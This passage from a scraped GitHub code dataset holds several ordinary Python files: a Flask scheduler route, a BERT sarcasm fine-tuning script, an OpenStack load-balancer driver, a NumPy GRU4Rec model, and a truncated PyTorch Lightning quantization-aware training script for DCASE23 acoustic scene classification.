True}\n\n except Exception as e:\n print(e)\n result = {'error' : str(e),\n 'success' : False}\n\n return result","repo_name":"ericdoppelt/mda-app","sub_path":"backend/routes/scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":3591,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"38832535407","text":"# Import necessary libraries\nfrom datasets import load_dataset\nfrom transformers import AutoTokenizer\nimport numpy as np\nfrom 
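`set_range` above parses two ISO timestamps and folds the hour and minute of the second onto the date of the first via a timedelta. The same arithmetic in isolation, with hypothetical sample values and the record's own format string:

from datetime import datetime, timedelta

start_date = datetime.strptime('2021-06-01T00:00:00.000Z', '%Y-%m-%dT%H:%M:%S.%fZ')
start_time = datetime.strptime('1970-01-01T14:30:00.000Z', '%Y-%m-%dT%H:%M:%S.%fZ')
# Keep the calendar date of the first stamp, the clock time of the second
start = start_date + timedelta(hours=start_time.hour, minutes=start_time.minute)
assert start == datetime(2021, 6, 1, 14, 30)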
transformers import Trainer\nfrom torch.utils.data import DataLoader, TensorDataset\nfrom transformers import AutoModelForSequenceClassification\nfrom torch.optim import AdamW\nfrom transformers import get_scheduler\nimport torch\nimport evaluate\nfrom tqdm.auto import tqdm\nfrom torch.nn.parallel import DataParallel\nimport argparse\n\n# Define the main function\ndef main():\n # Create an ArgumentParser object to handle command-line arguments\n parser = argparse.ArgumentParser(description=\"Argument Reader\")\n\n # Add command-line arguments with default values\n parser.add_argument(\"-m\", \"--model_path\", help=\"Path of model to fine-tune\", default=\"bert-base-cased\")\n parser.add_argument(\"-t\", \"--train_path\", help=\"Path of training data as csv\", default=\"./train_labeled.csv\")\n parser.add_argument(\"-v\", \"--test_path\", help=\"Path of test data as csv\", default=\"./test_labeled.csv\")\n parser.add_argument(\"-s\", \"--save_model_path\", help=\"Path to save the fine-tuned model\", default=\"./pretrained_sarcasm_on_bert\")\n\n # Parse the command-line arguments\n args = parser.parse_args()\n train_path = args.train_path\n test_path = args.test_path\n model_path = args.model_path\n save_model_path = args.save_model_path\n\n # Load test and train datasets from CSV files\n test_dataset = load_dataset(\"csv\", data_files=test_path, sep=\",\")\n train_dataset = load_dataset(\"csv\", data_files=train_path, sep=\",\")\n train_ds = train_dataset[\"train\"]\n test_ds = test_dataset[\"train\"]\n\n # Initialize a tokenizer for BERT\n tokenizer = AutoTokenizer.from_pretrained(\"bert-base-cased\")\n\n # Define a function to tokenize input examples\n def tokenize_function(examples):\n return tokenizer(examples[\"tweets\"], padding=\"max_length\", truncation=True, return_tensors=\"pt\")\n\n # Tokenize the test dataset\n tokenized_test_datasets = test_ds.map(tokenize_function, batched=True)\n tokenized_test_datasets = tokenized_test_datasets.remove_columns([\"tweets\"])\n tokenized_test_datasets = tokenized_test_datasets.rename_column(\"class\", \"labels\")\n tokenized_test_datasets.set_format(\"torch\")\n\n # Tokenize the train dataset\n tokenized_train_datasets = train_ds.map(tokenize_function, batched=True)\n tokenized_train_datasets = tokenized_train_datasets.remove_columns([\"tweets\"])\n tokenized_train_datasets = tokenized_train_datasets.rename_column(\"class\", \"labels\")\n tokenized_train_datasets.set_format(\"torch\")\n\n # Shuffle the train and test datasets\n train_dataset = tokenized_train_datasets.shuffle(seed=42)\n eval_dataset = tokenized_test_datasets.shuffle(seed=42)\n\n # Load the evaluation metric (e.g., accuracy)\n metric = evaluate.load(\"accuracy\")\n\n # Create data loaders for training and evaluation\n train_dataloader = DataLoader(train_dataset, shuffle=True, batch_size=8)\n eval_dataloader = DataLoader(eval_dataset, batch_size=8)\n\n # Load the model for sequence classification with the specified number of labels (2 in this case)\n model = AutoModelForSequenceClassification.from_pretrained(model_path, num_labels=2)\n\n # Check if CUDA (GPU) is available and configure device\n if torch.cuda.is_available():\n print(\"cuda\")\n device = torch.device(\"cuda\")\n print(\"device count =\", torch.cuda.device_count())\n if torch.cuda.device_count() > 1:\n model = DataParallel(model) # Wrap the model with DataParallel for multiple GPUs\n else:\n device = torch.device(\"cpu\")\n print(\"cpu\")\n\n # Initialize the AdamW optimizer\n optimizer = AdamW(model.parameters(), 
lr=5e-5)\n\n # Create a learning rate scheduler\n num_epochs = 3\n num_training_steps = num_epochs * len(train_dataloader)\n lr_scheduler = get_scheduler(\n name=\"linear\", optimizer=optimizer, num_warmup_steps=0, num_training_steps=num_training_steps\n )\n\n # Move the model to the selected device (CPU or GPU)\n model.to(device)\n\n # Create a progress bar for training\n progress_bar = tqdm(range(num_training_steps))\n\n # Set the model in training mode\n model.train()\n\n # Training loop\n for _ in range(num_epochs):\n for batch in train_dataloader:\n batch = {k: v.to(device) for k, v in batch.items()}\n outputs = model(**batch)\n loss = outputs.loss\n loss = loss.mean()\n loss.backward()\n\n optimizer.step()\n lr_scheduler.step()\n optimizer.zero_grad()\n progress_bar.update(1)\n\n # Save the fine-tuned model\n model.module.save_pretrained(save_model_path)\n print(\"Model saved\")\n\n# Entry point for the script\nif __name__ == \"__main__\":\n main()\n\n# Function for single tests of the model's accuracy, returns an integer\ndef single_test(input_str):\n batch = tokenizer(input_str, padding=\"max_length\", truncation=True, return_tensors=\"pt\")\n batch = {k: v.to(device) for k, v in batch.items()}\n with torch.no_grad():\n outputs = model(**batch)\n logits = outputs.logits\n predictions = torch.argmax(logits, dim=-1)\n return predictions.item()\n","repo_name":"galamit1/TAU-Workshop","sub_path":"fine_tuning/fine_tune_sarcasm.py","file_name":"fine_tune_sarcasm.py","file_ext":"py","file_size_in_byte":5222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"9933104141","text":"#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
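`single_test` at the bottom of fine_tune_sarcasm.py refers to `tokenizer`, `model`, and `device`, which only exist inside `main()`, so it would raise NameError as written. A hedged standalone version takes them as parameters instead:

import torch

def single_test(text, model, tokenizer, device):
    """Return the predicted class index (0 or 1) for one input string."""
    batch = tokenizer(text, padding='max_length', truncation=True, return_tensors='pt')
    batch = {k: v.to(device) for k, v in batch.items()}
    model.eval()
    with torch.no_grad():
        logits = model(**batch).logits
    return torch.argmax(logits, dim=-1).item()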
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n#\n#\n\nfrom array_neutron_lbaas.device_driver import device_driver\nfrom neutron_lbaas.drivers import driver_base\nimport threading\nimport logging\nimport traceback\n\nLOG = logging.getLogger(__name__)\n\nclass ArrayLoadBalancerDriver(driver_base.LoadBalancerBaseDriver):\n\n def __init__(self, plugin):\n super(ArrayLoadBalancerDriver, self).__init__(plugin)\n self.load_balancer = ArrayLoadBalancerManager(self)\n self.listener = ArrayListenerManager(self)\n self.pool = ArrayPoolManager(self)\n self.member = ArrayMemberManager(self)\n self.health_monitor = ArrayHealthMonitorManager(self)\n self.device_driver = device_driver.ArrayDeviceDriverV2(plugin)\n\n\nclass ArrayLoadBalancerManager(driver_base.BaseLoadBalancerManager):\n def create(self, context, obj):\n thread = threading.Thread(target=self._create, args=(context, obj))\n thread.start()\n\n def _create(self, context, obj):\n try:\n self.driver.device_driver.create_loadbalancer(context, obj)\n self.successful_completion(context, obj)\n except Exception as e:\n LOG.debug(\"trace is below: %s\", traceback.format_exc())\n self.failed_completion(context, obj)\n\n def update(self, context, old_obj, obj):\n try:\n self.driver.device_driver.update_loadbalancer(context, obj, old_obj)\n self.successful_completion(context, obj)\n except Exception as e:\n self.failed_completion(context, obj)\n\n def delete(self, context, obj):\n try:\n self.driver.device_driver.delete_loadbalancer(context, obj)\n except Exception:\n pass\n self.successful_completion(context, obj, delete=True)\n\n def refresh(self, context, lb_obj):\n self.driver.device_driver.refresh(context, lb_obj)\n\n def stats(self, context, lb_obj):\n return self.driver.device_driver.stats(context, lb_obj)\n\n\nclass ArrayListenerManager(driver_base.BaseListenerManager):\n def create(self, context, obj):\n try:\n self.driver.device_driver.create_listener(context, obj)\n self.successful_completion(context, obj)\n except Exception:\n self.failed_completion(context, obj)\n\n def update(self, context, old_obj, obj):\n try:\n self.driver.device_driver.update_listener(context, obj, old_obj)\n self.successful_completion(context, obj)\n except Exception:\n self.failed_completion(context, obj)\n\n def delete(self, context, obj):\n try:\n self.driver.device_driver.delete_listener(context, obj)\n except Exception:\n pass\n self.successful_completion(context, obj, delete=True)\n\n\nclass ArrayPoolManager(driver_base.BasePoolManager):\n def create(self, context, obj):\n try:\n self.driver.device_driver.create_pool(context, obj)\n self.successful_completion(context, obj)\n except Exception:\n self.failed_completion(context, obj)\n\n def update(self, context, old_obj, obj):\n try:\n self.driver.device_driver.update_pool(context, obj, old_obj)\n self.successful_completion(context, obj)\n except Exception:\n self.failed_completion(context, obj)\n\n def delete(self, context, obj):\n try:\n self.driver.device_driver.delete_pool(context, obj)\n except Exception:\n pass\n self.successful_completion(context, obj, delete=True)\n\n\nclass ArrayMemberManager(driver_base.BaseMemberManager):\n def create(self, context, obj):\n try:\n self.driver.device_driver.create_member(context, obj)\n self.successful_completion(context, obj)\n except Exception:\n self.failed_completion(context, obj)\n\n def update(self, context, old_obj, obj):\n try:\n self.driver.device_driver.update_member(context, obj, old_obj)\n 
self.successful_completion(context, obj)\n except Exception:\n self.failed_completion(context, obj)\n\n def delete(self, context, obj):\n try:\n self.driver.device_driver.delete_member(context, obj)\n except Exception:\n pass\n self.successful_completion(context, obj, delete=True)\n\n def get(self, context, obj):\n try:\n status = self.driver.device_driver.get_member_health(context, obj)\n except Exception:\n status = \"UNKNOWN\"\n return status\n\n\nclass ArrayHealthMonitorManager(driver_base.BaseHealthMonitorManager):\n def create(self, context, obj):\n try:\n self.driver.device_driver.create_healthmonitor(context, obj)\n self.successful_completion(context, obj)\n except Exception:\n self.failed_completion(context, obj)\n\n def update(self, context, old_obj, obj):\n try:\n self.driver.device_driver.update_healthmonitor(context, obj, old_obj)\n self.successful_completion(context, obj)\n except Exception:\n self.failed_completion(context, obj)\n\n def delete(self, context, obj):\n try:\n self.driver.device_driver.delete_healthmonitor(context, obj)\n except Exception:\n pass\n self.successful_completion(context, obj, delete=True)\n\n","repo_name":"jarod-w/array-lbaasv2-vapv","sub_path":"array_neutron_lbaas/driver/driver_v2.py","file_name":"driver_v2.py","file_ext":"py","file_size_in_byte":5880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"13060629943","text":"import numpy as np\nimport pandas as pd\nimport time\n\n\nclass GruBaseNp(object):\n def __init__(self,is_straining, session_key, item_key, time_key, batch_size, embedding = 0 ,\n hidden_act = 'tanh', final_act='elu-0.5', loss=\"bpr\", grad_cap=0, layers=[100], rnn_size=100, n_epochs=10,\n learning_rate=0.1, checkpoint_dir=\"\",\n adapt=\"adagrad\", pre_embedding_y=0, pre_embedding_x=0, ):\n \"\"\"\n :param session_key: string, header of the session ID column in the input file (default: 'SessionId')\n :param item_key: string, header of the item ID column in the input file (default: 'ItemId')\n :param time_key: string\n :param layers: list of int values, list of the number of GRU units in the layers (default : [100])\n :param batch_size : int, size of the minibacth, also effect the number of negative samples through minibatch based sampling (default: 32)\n :param pre_embedding_y: int, size of the embedding used for output\n :param pre_embedding_x: int, size of the embedding used for input\n :param embedding : int, size of the embedding used, 0 means not to use embedding (default: 0)\n :param adapt: string, sets the appropriate learning rate adaptation strategy, (default: \"adagrad\")\n :param hidden_act: string, 'linear', 'relu', 'tanh', 'leaky-', 'elu-', 'selu--' selects the activation function on the hidden states, and are the parameters of the activation function (default : 'tanh')\n :param final_act : 'softmax', 'linear', 'relu', 'tanh', 'softmax_logit', 'leaky-', 'elu-', 'selu--' selects the activation function of the final layer, and are the parameters of the activation function (default : 'elu-1')\n \"\"\"\n self.is_training = is_straining\n self.session_key = session_key\n self.item_key = item_key\n self.time_key = time_key\n self.batch_size = batch_size\n self.embedding = embedding\n self.pre_embedding_x = pre_embedding_x\n self.pre_embedding_y = pre_embedding_y\n\n self.hidden_act = hidden_act\n self.set_hidden_activation(self.hidden_act)\n self.final_act = final_act\n self.set_final_activation(self.final_act)\n self.loss = loss\n self.grad_cap = grad_cap\n 
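Only ArrayLoadBalancerManager.create is made asynchronous in driver_v2.py, by hand-rolling a threading.Thread. If the other managers ever needed the same fire-and-forget behaviour, the pattern factors into a small decorator; a sketch (decorator name hypothetical, not part of the driver):

import threading
from functools import wraps

def run_in_thread(func):
    # Fire-and-forget: schedule the wrapped call on a worker thread
    @wraps(func)
    def wrapper(*args, **kwargs):
        thread = threading.Thread(target=func, args=args, kwargs=kwargs)
        thread.start()
        return thread
    return wrapper

@run_in_thread
def slow_task(x):
    print('processing', x)

slow_task(42).join()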
self.layers = layers\n self.rnn_size=rnn_size\n self.n_epochs=n_epochs\n self.learning_rate=learning_rate\n self.checkpoint_dir=checkpoint_dir\n self.n_items = None\n self.itemidmap = None\n\n def linear(self, inp):\n return inp\n\n def tanh(self, inp):\n return np.tanh(inp)\n\n def relu(self, inp):\n inp[inp < 0] = 0\n return inp\n\n def sigmoid(self, inp):\n return 1/(1 + np.exp(-inp))\n\n def softmax(self, inp):\n return np.exp(inp) / sum(np.exp(inp))\n\n class Elu:\n def __init__(self, alpha):\n self.alpha = alpha\n self.elu = lambda Z: np.where(Z > 0, Z, self.alpha * (np.exp(Z) - 1))\n\n def execute(self, inp):\n return self.elu(inp)\n\n def set_hidden_activation(self, hidden_act):\n if self.hidden_act == 'tanh':\n self.hidden_activation = self.tanh\n elif self.hidden_act == 'relu':\n self.hidden_activation = self.relu\n else:\n raise NotImplementedError\n\n def set_final_activation(self, final_act):\n if final_act == 'linear':\n self.final_activation = self.linear\n elif final_act == 'relu':\n self.final_activation = self.relu\n elif final_act == 'tanh':\n self.final_activation = self.tanh\n elif final_act.startswith('elu-'):\n self.final_activation = self.Elu(float(final_act.split('-')[1])).execute\n else:\n raise NotImplementedError\n\n\nclass Gru4recNp(GruBaseNp):\n def __init__(self,is_straining, session_key, item_key, time_key, batch_size, embedding = 0 ,\n hidden_act = 'tanh', final_act='elu-0.5', loss=\"bpr\", grad_cap=0, layers=[100], rnn_size=100, n_epochs=10,\n learning_rate=0.1, checkpoint_dir=\"\",\n adapt=\"adagrad\", pre_embedding_y=0, pre_embedding_x=0):\n super().__init__(is_straining, session_key, item_key, time_key, batch_size, embedding,\n hidden_act, final_act, loss, grad_cap, layers, rnn_size, n_epochs,\n learning_rate, checkpoint_dir,\n adapt, pre_embedding_y, pre_embedding_x)\n\n def process_data(self, data):\n itemids = data[self.item_key].unique()\n self.n_items = len(itemids)\n self.itemidmap = pd.Series(data=np.arange(self.n_items), index=itemids)\n data = pd.merge(data, pd.DataFrame({self.item_key: itemids, 'ItemIdx': self.itemidmap[itemids].values}),\n on=self.item_key, how='inner')\n data.astype({'ItemIdx': 'int32'})\n data.sort_values([self.session_key, self.time_key], inplace=True)\n offset_sessions = np.zeros(data[self.session_key].nunique() + 1, dtype=np.int32)\n offset_sessions[1:] = data.groupby(self.session_key).size().cumsum()\n return data, offset_sessions\n\n def init(self, weights):\n self.Wx = weights[\"Wx\"]\n self.Wh = weights[\"Wh\"]\n self.Wrz = weights[\"Wrz\"]\n self.Bh = weights[\"Bh\"]\n if self.embedding:\n self.E = weights[\"E\"]\n self.Wy=weights[\"Wy\"]\n self.By=weights[\"By\"]\n\n\n def model(self, X, H, M, R=None, Y=None, predict=False):\n if self.embedding:\n Sx = self.E[X]\n y = Sx\n H_new = []\n start = 0\n\n else:\n Sx =self.Wx[0][X]\n vec = Sx + self.Bh[0]\n rz = self.sigmoid(vec[:, self.layers[0]:] + np.matmul(H[0], self.Wrz[0]))\n h = self.hidden_activation(np.matmul(H[0] * rz[:, :self.layers[0]], self.Wh[0]) + vec[:, :self.layers[0]])\n z = rz[:, self.layers[0]:]\n h = (1.0 - z) * H[0] + z * h\n y = h\n start = 1\n H_new = [h]\n\n for i in range(start, len(self.layers)):\n vec = np.matmul(y, self.Wx[i]) + self.Bh[i]\n rz = np.sigmoid(vec[:, self.layers[i]:] + np.matmul(H[i], self.Wrz[i]))\n h = self.hidden_activation(np.matmul(H[i] * rz[:, :self.layers[i]], self.Wh[i]) + vec[:, :self.layers[i]])\n z = rz[:, self.layers[i]:]\n h = (1.0 - z) * H[i] + z * h\n y = h\n H_new.append(h)\n if Y is not None:\n Sy = self.Wy[Y]\n 
SBy = self.By[Y]\n y = self.final_activation(np.matmul(y, np.transpose(Sy)) + np.squeeze(SBy))\n return H_new, y\n else:\n y = self.final_activation(np.matmul(y, np.transpose(self.Wy)) + np.squeeze(self.By))\n return H_new, y\n\n def predict(self, X, Y, M, H, items):\n if items is not None:\n H_new, yhat= self.model(X, H, M, R=None, Y=Y, predict=True)\n else:\n H_new, yhat = self.model(X, H, M, R=None, Y=None, predict=True)\n return yhat, H_new\n","repo_name":"dawn-farsi/gru4rec-in-tensorflow","sub_path":"services/Gru4recNp.py","file_name":"Gru4recNp.py","file_ext":"py","file_size_in_byte":7122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"74624040574","text":"import pytorch_lightning as pl\nfrom pytorch_lightning.loggers import WandbLogger\nfrom pytorch_lightning.callbacks import LearningRateMonitor\nimport torch\nfrom torch.utils.data import DataLoader\nimport argparse\nimport torch.nn.functional as F\nimport torch.nn as nn\nimport os\nimport pathlib\n\nfrom datasets.dcase23 import get_training_set, get_test_set\nfrom helpers.init import worker_init_fn\nfrom models.cp_mobile_clean import get_model\nfrom models.mel import AugmentMelSTFT\nfrom helpers.lr_schedule import exp_warmup_linear_down\nfrom helpers.utils import mixstyle, QuantizationCallback, QuantParamFreezeCallback\nfrom helpers import nessi\n\n\nclass PLModule(pl.LightningModule):\n def __init__(self, config):\n super().__init__()\n self.config = config # results from argparse and contains all configurations for our experiment\n # model to preprocess waveforms into log mel spectrograms\n self.mel = AugmentMelSTFT(n_mels=config.n_mels,\n sr=config.resample_rate,\n win_length=config.window_size,\n hopsize=config.hop_size,\n n_fft=config.n_fft,\n freqm=config.freqm,\n timem=config.timem,\n fmin=config.fmin,\n fmax=config.fmax,\n fmin_aug_range=config.fmin_aug_range,\n fmax_aug_range=config.fmax_aug_range\n )\n\n # CP-Mobile - our model to be trained on the log mel spectrograms\n self.model = get_model(n_classes=config.n_classes,\n in_channels=config.in_channels,\n base_channels=config.base_channels,\n channels_multiplier=config.channels_multiplier,\n expansion_rate=config.expansion_rate\n )\n\n # int8 model will be initialized later\n self.model_int8 = None\n\n self.kl_div_loss = nn.KLDivLoss(log_target=True, reduction=\"none\") # KL Divergence loss for soft targets\n\n self.device_ids = ['a', 'b', 'c', 's1', 's2', 's3', 's4', 's5', 's6']\n self.label_ids = ['airport', 'bus', 'metro', 'metro_station', 'park', 'public_square', 'shopping_mall',\n 'street_pedestrian', 'street_traffic', 'tram']\n # categorization of devices into 'real', 'seen' and 'unseen'\n self.device_groups = {'a': \"real\", 'b': \"real\", 'c': \"real\",\n 's1': \"seen\", 's2': \"seen\", 's3': \"seen\",\n 's4': \"unseen\", 's5': \"unseen\", 's6': \"unseen\"}\n\n def mel_forward(self, x):\n \"\"\"\n @param x: a batch of raw signals (waveform)\n return: a batch of log mel spectrograms\n \"\"\"\n old_shape = x.size()\n x = x.reshape(-1, old_shape[2]) # for calculating log mel spectrograms we remove the channel dimension\n x = self.mel(x)\n x = x.reshape(old_shape[0], old_shape[1], x.shape[1], x.shape[2]) # batch x channels x mels x time-frames\n return x\n\n def forward(self, x):\n \"\"\"\n :param x: batch of spectrograms\n :return: final model predictions\n \"\"\"\n x = self.model(x)\n return x\n\n def quantized_forward(self, x):\n \"\"\"\n :param x: batch of spectrograms\n :return: final model 
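The gate arithmetic inside Gru4recNp.model reduces to one standard GRU update per layer (note that the multi-layer branch calls np.sigmoid, which does not exist in NumPy; the class's own sigmoid is presumably intended). A distilled sketch of one step, assuming hidden width d, with vec holding the candidate pre-activation in its first d columns and both gate pre-activations after, exactly as the record slices it:

import numpy as np

def sigmoid(x):
    return 1.0 / (1.0 + np.exp(-x))

def gru_step(h, vec, Wrz, Wh):
    d = h.shape[1]
    rz = sigmoid(vec[:, d:] + h @ Wrz)      # reset and update gates, stacked
    r, z = rz[:, :d], rz[:, d:]
    h_cand = np.tanh((h * r) @ Wh + vec[:, :d])
    return (1.0 - z) * h + z * h_cand       # convex blend of old and candidate state

h = np.zeros((2, 4))
vec = np.random.randn(2, 12)                # d candidate + 2d gate pre-activations
print(gru_step(h, vec, np.random.randn(4, 8), np.random.randn(4, 4)).shape)  # (2, 4)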
predictions\n \"\"\"\n # quantized forward needs to be done on cpu\n orig_device = x.device\n x = x.cpu()\n self.model_int8.cpu()\n y = self.model_int8(x)\n return y.to(orig_device)\n\n def configure_optimizers(self):\n \"\"\"\n This is the way pytorch lightening requires optimizers and learning rate schedulers to be defined.\n The specified items are used automatically in the optimization loop (no need to call optimizer.step() yourself).\n :return: dict containing optimizer and learning rate scheduler\n \"\"\"\n optimizer = torch.optim.Adam(self.parameters(), lr=self.config.lr, weight_decay=self.config.weight_decay)\n schedule_lambda = \\\n exp_warmup_linear_down(self.config.warm_up_len, self.config.ramp_down_len, self.config.ramp_down_start,\n self.config.last_lr_value)\n lr_scheduler = torch.optim.lr_scheduler.LambdaLR(optimizer, schedule_lambda)\n return {\n 'optimizer': optimizer,\n 'lr_scheduler': lr_scheduler\n }\n\n def training_step(self, train_batch, batch_idx):\n \"\"\"\n :param train_batch: contains one batch from train dataloader\n :param batch_idx\n :return: a dict containing at least loss that is used to update model parameters, can also contain\n other items that can be processed in 'training_epoch_end' to log other metrics than loss\n \"\"\"\n x, file, labels, devices, cities, teacher_logits = train_batch\n x = self.mel_forward(x) # we convert the raw audio signals into log mel spectrograms\n\n if self.config.mixstyle_p > 0:\n # frequency mixstyle\n x = mixstyle(x, self.config.mixstyle_p, self.config.mixstyle_alpha)\n\n y_hat = self.model(x)\n samples_loss = F.cross_entropy(y_hat, labels, reduction=\"none\")\n label_loss = samples_loss.mean()\n\n # Temperature adjusted probabilities of teacher and student\n with torch.cuda.amp.autocast():\n y_hat_soft = F.log_softmax(y_hat / self.config.temperature, dim=-1)\n\n kd_loss = self.kl_div_loss(y_hat_soft, teacher_logits).mean()\n kd_loss = kd_loss * (self.config.temperature ** 2)\n loss = self.config.kd_lambda * label_loss + (1 - self.config.kd_lambda) * kd_loss\n\n results = {\"loss\": loss, \"label_loss\": label_loss * self.config.kd_lambda,\n \"kd_loss\": kd_loss * (1 - self.config.kd_lambda)}\n\n return results\n\n def training_epoch_end(self, outputs):\n \"\"\"\n :param outputs: contains the items you log in 'training_step'\n :return: a dict containing the metrics you want to log to Weights and Biases\n \"\"\"\n avg_loss = torch.stack([x['loss'] for x in outputs]).mean()\n avg_label_loss = torch.stack([x['label_loss'] for x in outputs]).mean()\n avg_kd_loss = torch.stack([x['kd_loss'] for x in outputs]).mean()\n self.log_dict({'loss': avg_loss, 'label_loss': avg_label_loss, 'kd_loss': avg_kd_loss})\n\n def validation_step(self, val_batch, batch_idx):\n x, files, labels, devices, cities = val_batch\n x = self.mel_forward(x)\n\n # fp32 accuracy + loss\n y_hat = self.forward(x)\n samples_loss = F.cross_entropy(y_hat, labels, reduction=\"none\")\n fp32_loss = samples_loss.mean()\n _, preds = torch.max(y_hat, dim=1)\n n_correct_pred_per_sample = (preds == labels)\n fp32_n_correct_pred = n_correct_pred_per_sample.sum()\n\n # quantized metrics\n y_hat = self.quantized_forward(x)\n samples_loss = F.cross_entropy(y_hat, labels, reduction=\"none\")\n loss = samples_loss.mean()\n\n # for computing accuracy\n _, preds = torch.max(y_hat, dim=1)\n n_correct_pred_per_sample = (preds == labels)\n n_correct_pred = n_correct_pred_per_sample.sum()\n\n dev_names = [d.rsplit(\"-\", 1)[1][:-4] for d in files]\n results = {'val_loss': loss, 
\"n_correct_pred\": n_correct_pred, \"n_pred\": len(labels),\n \"fp32_val_loss\": fp32_loss, \"fp32_n_correct_pred\": fp32_n_correct_pred}\n\n # log metric per device and scene\n for d in self.device_ids:\n results[\"devloss.\" + d] = torch.as_tensor(0., device=self.device)\n results[\"devcnt.\" + d] = torch.as_tensor(0., device=self.device)\n results[\"devn_correct.\" + d] = torch.as_tensor(0., device=self.device)\n for i, d in enumerate(dev_names):\n results[\"devloss.\" + d] = results[\"devloss.\" + d] + samples_loss[i]\n results[\"devn_correct.\" + d] = results[\"devn_correct.\" + d] + n_correct_pred_per_sample[i]\n results[\"devcnt.\" + d] = results[\"devcnt.\" + d] + 1\n\n for l in self.label_ids:\n results[\"lblloss.\" + l] = torch.as_tensor(0., device=self.device)\n results[\"lblcnt.\" + l] = torch.as_tensor(0., device=self.device)\n results[\"lbln_correct.\" + l] = torch.as_tensor(0., device=self.device)\n for i, l in enumerate(labels):\n results[\"lblloss.\" + self.label_ids[l]] = results[\"lblloss.\" + self.label_ids[l]] + samples_loss[i]\n results[\"lbln_correct.\" + self.label_ids[l]] = \\\n results[\"lbln_correct.\" + self.label_ids[l]] + n_correct_pred_per_sample[i]\n results[\"lblcnt.\" + self.label_ids[l]] = results[\"lblcnt.\" + self.label_ids[l]] + 1\n return results\n\n def validation_epoch_end(self, outputs):\n avg_loss = torch.stack([x['val_loss'] for x in outputs]).mean()\n val_acc = sum([x['n_correct_pred'] for x in outputs]) * 1.0 / sum(x['n_pred'] for x in outputs)\n\n fp32_avg_loss = torch.stack([x['fp32_val_loss'] for x in outputs]).mean()\n fp32_val_acc = sum([x['fp32_n_correct_pred'] for x in outputs]) * 1.0 / sum(x['n_pred'] for x in outputs)\n\n logs = {'val_acc': val_acc, 'val_loss': avg_loss, 'fp32_val.loss': fp32_avg_loss, 'fp32_val_acc': fp32_val_acc}\n\n # log metric per device and scene\n for d in self.device_ids:\n dev_loss = torch.stack([x[\"devloss.\" + d] for x in outputs]).sum()\n dev_cnt = torch.stack([x[\"devcnt.\" + d] for x in outputs]).sum()\n dev_corrct = torch.stack([x[\"devn_correct.\" + d] for x in outputs]).sum()\n logs[\"vloss.\" + d] = dev_loss / dev_cnt\n logs[\"vacc.\" + d] = dev_corrct / dev_cnt\n logs[\"vcnt.\" + d] = dev_cnt\n # device groups\n logs[\"acc.\" + self.device_groups[d]] = logs.get(\"acc.\" + self.device_groups[d], 0.) + dev_corrct\n logs[\"count.\" + self.device_groups[d]] = logs.get(\"count.\" + self.device_groups[d], 0.) + dev_cnt\n logs[\"lloss.\" + self.device_groups[d]] = logs.get(\"lloss.\" + self.device_groups[d], 0.) 
+ dev_loss\n\n for d in set(self.device_groups.values()):\n logs[\"acc.\" + d] = logs[\"acc.\" + d] / logs[\"count.\" + d]\n logs[\"lloss.\" + d] = logs[\"lloss.\" + d] / logs[\"count.\" + d]\n\n for l in self.label_ids:\n lbl_loss = torch.stack([x[\"lblloss.\" + l] for x in outputs]).sum()\n lbl_cnt = torch.stack([x[\"lblcnt.\" + l] for x in outputs]).sum()\n lbl_corrct = torch.stack([x[\"lbln_correct.\" + l] for x in outputs]).sum()\n logs[\"vloss.\" + l] = lbl_loss / lbl_cnt\n logs[\"vacc.\" + l] = lbl_corrct / lbl_cnt\n logs[\"vcnt.\" + l] = lbl_cnt\n\n logs[\"macro_avg_acc\"] = torch.mean(torch.stack([logs[\"vacc.\" + l] for l in self.label_ids]))\n self.log_dict(logs)\n\n\ndef fuse_model(module):\n # fuse layers\n module.model.eval() # only works in eval mode\n module.model.cpu()\n module.model.fuse_model()\n\n # put original net back on cuda\n module.model.cuda()\n\n\ndef prepare_quantized(module):\n module.model.train() # only works in train mode\n module.model.cpu()\n\n # give information of what kind of observers to attach\n module.model.qconfig = torch.ao.quantization.get_default_qat_qconfig('fbgemm')\n\n # prepare model for QAT, insert observers and fake_quants\n module.model = torch.ao.quantization.prepare_qat(module.model)\n\n # attach the quantized model to module\n module.model_int8 = torch.ao.quantization.convert(module.model)\n\n # put original net back on cuda and in train mode\n module.model.cuda()\n module.model.train()\n\n\ndef load_pretrained_from_id(module, project_name, wandb_id):\n ckpt_path = os.path.join(project_name, wandb_id, \"checkpoints\")\n assert os.path.exists(ckpt_path), f\"No checkpoint path '{ckpt_path}' found.\"\n ckpt_files = [file for file in pathlib.Path(os.path.expanduser(ckpt_path)).rglob('*.ckpt')]\n assert len(ckpt_files) > 0, f\"No checkpoint files found in path {ckpt_path}.\"\n latest_ckpt = sorted(ckpt_files)[-1]\n state_dict = torch.load(latest_ckpt)['state_dict']\n # remove \"model\" prefix\n state_dict = {k[len(\"model.\"):]: state_dict[k] for k in state_dict.keys()}\n module.model.load_state_dict(state_dict)\n\n\ndef train(config):\n # logging is done using wandb\n wandb_logger = WandbLogger(\n project=config.project_name,\n notes=\"CPJKU pipeline for DCASE23 Task 1.\",\n tags=[\"DCASE23\"],\n config=config, # this logs all hyperparameters for us\n name=config.experiment_name\n )\n\n # train dataloader\n train_dl = DataLoader(dataset=get_training_set(config.cache_path, config.resample_rate, config.roll,\n config.dir_prob, config.temperature),\n worker_init_fn=worker_init_fn,\n num_workers=config.num_workers,\n batch_size=config.batch_size,\n shuffle=True)\n\n # test loader\n test_dl = DataLoader(dataset=get_test_set(config.cache_path, config.resample_rate),\n worker_init_fn=worker_init_fn,\n num_workers=config.num_workers,\n batch_size=config.batch_size)\n\n # create pytorch lightening module\n pl_module = PLModule(config)\n\n # load model to fine-tune via QAT\n if config.wandb_id:\n load_pretrained_from_id(pl_module, config.project_name, config.wandb_id)\n\n # fuse layers and prepare for QAT\n fuse_model(pl_module)\n 